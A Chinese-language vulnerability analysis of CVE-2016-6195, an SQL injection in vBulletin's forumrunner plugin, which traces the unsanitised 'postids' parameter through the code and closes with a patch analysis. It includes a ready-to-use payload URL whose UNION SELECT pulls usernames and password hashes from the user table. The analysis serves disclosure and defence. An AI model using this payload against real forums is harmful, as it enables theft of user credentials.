VBulletin 核心插件 forumrunner SQL注入(CVE-2016-6195)漏洞分析

分析所用版本4.2.1

漏洞的本质是forumrunner/includes/moderation.php文件中， do_get_spam_data()函数()对参数postids和threadid过滤不严导致SQL注入漏洞， 核心代码如下：

function do_get_spam_data (){  
    global $vbulletin, $db, $vbphrase;


    $vbulletin->input->clean_array_gpc('r', array(
    'threadid' => TYPE_STRING,
    'postids' => TYPE_STRING,
    ));


    ...


    }else if ($vbulletin->GPC['postids'] != '') {
        $postids = $vbulletin->GPC['postids'];


        $posts = $db->query_read_slave("
            SELECT post.postid, post.threadid, post.visible, post.title, post.userid,
                thread.forumid, thread.title AS thread_title, thread.postuserid, thread.visible AS thread_visible, thread.firstpostid
            FROM " . TABLE_PREFIX . "post AS post
            LEFT JOIN " . TABLE_PREFIX . "thread AS thread USING (threadid)
            WHERE postid IN ($postids)
        ");

VBulletin程序中并不直接使用$_GET等全局变量获取输入数据，而是使用clean_gpc() 和 clean_array_gpc() 函数来过滤输入数据，而这两个函数并未对STRING类型做严格过滤，而传入的参数postids是作为SRING类型解析，参数postids随后拼接在SQL语句中进行查询，导致SQL注入漏洞。
寻找调用或包含do_get_spam_data()函数的代码，发现forumrunner/support/common_methods.php

  'get_spam_data' => array(
    'include' => 'moderation.php',
    'function' => 'do_get_spam_data',
    ),

继续回溯，发现forumrunner/request.php文件包含support/common_methods.php.

...


$processed = process_input(array('cmd' => STRING, 'frv' => STRING, 'frp' => STRING));
if (!$processed['cmd']) {  
    return;
}


...


require_once(MCWD . '/support/common_methods.php');


...


if (!isset($methods[$processed['cmd']])) {  
    json_error(ERR_NO_PERMISSION);
}



if ($methods[$processed['cmd']]['include']) {  
    require_once(MCWD . '/include/' . $methods[$processed['cmd']]['include']);
}



if (isset($_REQUEST['d'])) {  
    error_reporting(E_ALL);
}

$out = call_user_func($methods[$processed['cmd']]['function']);


...

上面代码中process_input()函数(forumrunner/support/utils.php), 会从$_REQUEST中取值，进行简单的类型转换，STRING类型则原样返回，根据上面代码，可以通过$_REQUEST[‘cmd’]参数调用get_spam_data()函数， 进而调用do_get_spam_data()函数。设置$_REQUEST[‘d’]参数将打开错误报告，有助于SQL注入，当然也可以不设置$_REQUEST[‘d’]参数，这对触发SQL注入漏洞没有影响。剩下的就是使用postids参数构造SQL payload
postids参数注入

payload: forumrunner/request.php?d=1&cmd=get_spam_data&postids=-1)union select 1,2,3,(select concat(username, 0x3a, password) from user),5,1,7,8,9,10--+

设置断点及变量取值,注入结果如下：

从图中可以看出SQL注入语句执行成功，$post[‘title’]变量已经获取了用户名和密码，其中forumid设置为1, 保证下面代码不会进入if条件判断语句中。

while ($post = $db->fetch_array($posts))  
    {
        $forumperms = fetch_permissions($post['forumid']);
        if  (
            !($forumperms & $vbulletin->bf_ugp_forumpermissions['canview'])
                OR
            !($forumperms & $vbulletin->bf_ugp_forumpermissions['canviewthreads'])
                OR
            (!($forumperms & $vbulletin->bf_ugp_forumpermissions['canviewothers']) AND $post['postuserid'] != $vbulletin->userinfo['userid'])
            )
        {
            json_error(ERR_NO_PERMISSION);
        }

补丁分析
includes/general_vb.php文件, fr_clean_ids函数对id类变量进行了整数转换，从而阻止SQL注入攻击。

function fr_clean_ids($list = ”)  
{
$arr = explode(‘,’,$list);
$cleanarr = array_map(‘intval’,$arr);
return implode(‘,’,$cleanarr);  
}
forumrunner/include/moderation.php文件, do_get_spam_data函数过滤$postids和$threadid 参数


$vbulletin->GPC[‘postids’] = fr_clean_ids($vbulletin->GPC[‘postids’]);


...



if ($vbulletin->GPC[‘threadid’] != ”) {  
$threadids = $vbulletin->GPC[‘threadid’];



$threadids = fr_clean_ids($threadids);


...

Author: janes(知道创宇404安全实验室)，原文地址：http://paper.seebug.org/116/